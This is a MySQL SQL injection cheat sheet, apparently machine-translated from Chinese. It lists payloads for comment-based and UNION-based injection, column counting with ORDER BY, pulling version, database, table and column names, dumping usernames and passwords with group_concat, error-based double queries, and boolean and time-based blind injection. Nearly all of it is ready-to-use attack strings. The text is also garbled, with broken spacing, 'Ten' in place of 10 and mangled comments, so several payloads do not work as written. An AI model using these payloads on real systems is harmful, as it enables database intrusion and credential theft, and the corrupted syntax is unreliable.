#常规注入' --+'--% -' #'% at'and 1=1--+' and 1=2--+'and 1=2 Union SELECT * FROM admin--+' and 1=2Union SELECT * FROM User--+'and 1=2 Union SELECT * from users--+ #爆字段长度'ORDER BY1--+'ORDER by 2--+'ORDER BY3--+'ORDER by 4--+'ORDER BY5--+'ORDER BY 6--+'ORDER BY7--+'ORDER by 8--+'ORDER BY9--+'ORDER by--+ #爆数据库信息, which is limited to a field length of 1' and 1=2UNION ALL Select version ()--+'and 1=2 UNION ALL Select User ()--+' and 1=2UNION ALL Select Database ()--+#判断操作系统'and 1=2 UNION ALL SELECT @ @global. Version_compile_os from Mysql.user--+ #数据库权限, returns the normal description root permission;' andOrd (User (),1,1))= the--+#爆数据'and 1=2 Union Select User (), version (), database (), @ @datadir, Schema_name,current_user (), 7,8,9,10 from Information_ Schema. Schemata Limit 0,1--+' and 1=2Union Select1,2,3, TABLE_NAME,5,6,7,8,9,TenFrom INFORMATION_SCHEMA. TABLES where table_schema=database () limit0,1--+'and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where Table_name=table_name limit 0,1--+' and 1=2Union Select1,2,3, Group_concat (column_name),5,6,7,8,9,TenFrom INFORMATION_SCHEMA. COLUMNS where Table_name=table_name limit0,1--+'and 1=2 Union select 1,2,3,GROUP_CONCAT (username), 5,6,7,8,9,10 from table_name--+' and 1=2Union Select1,2,3, Group_concat (Username,0x3a,password),5,6,7,8,9,TenFrom table_name--+#不使用注释符' and'1'Union Select 1 and'1 'Union Select and'1 'and 1=2 Union select 1,version (), 3 and'1 'or'1#带括号防注入') --+') --% -') #') % at#双引号防注入" --+"--%20" #"%23#双引号+brackets") --+")--%20") #")%23#双查询输入 # Count the number of fields select COUNT (*) from table_name; #随机数生成select rand (); select rand ()*4; #浮点数select Floor (Rand ()), select Floor (rand ()*4); #别名select Floor (rand ()*4as query; #分组select Username,password from the user group by username; #两次查询select (select Database ()); #连接字符串concat (str1 , str2) Select Concat ((select Database ())), select Concat (0x3a,0x3a, (select Database ()), 0x3a,0x3a), select Concat (0x3a, 0X3A, (select Database ()), 0x3a,0x3a) as Query;select concat (0x3a,0x3a, (select Database ()), 0x3a,floor (rand ()*2) as Query;select concat (0x3a,0x3a, (select Database ()), 0x3a,floor (rand ()*2) as query from User;select count (*), Concat (0x3a,0x3a, (select Database ()), 0x3a,floor (rand () *2) as query from the user group by Query;select count (*), Concat (0x3a,0x3a, (select User ()), 0x3a,floor (rand () *2) as query from the user group by Query;select count (*), Concat (0X3A,0X3A, (select table_name from INFORMATION_SCHEMA. TABLES where table_schema=database () limit0,1), 0x3a,floor (rand () *2) as query from the user group by query;'and (select 1 from (SELECT COUNT (*), concat (0X3A,0X3A, (select table_name from INFORMATION_SCHEMA. TABLES where table_schema=database () limit 0,1), 0x3a,floor (rand ()) as query from the user group by query) as test)--+' and 1=2Union (SELECT * FROM (SELECT COUNT (*), concat (0X3A,0X3A, (select table_name from INFORMATION_SCHEMA. TABLES where table_schema=database () limit0,1), 0x3a,floor (rand () *2) as query from the user group by query) as test--+#盲注 #bool-type blind Select database (), #判断长度select Length (Database ()), #截取字符串substr (str,num1,num2) NUM1: From the beginning of the first; NUM2: Number of Select SUBSTR (Database (),1,1); #ascii码select ASCII (substr (),1,1));'and 1<2--+' and(ASCII (substr (select Database ()),1,1)))=98--+#时间型盲注 # Sleep Select Sleep (1); #进行判断select if ((select Database ())="Bloodzero ", Sleep (Ten), null);'and Sleep (Ten)--+' andif ((select Database ()) ="Bloodzero ", Sleep (Ten), null)--+
Common injection Statements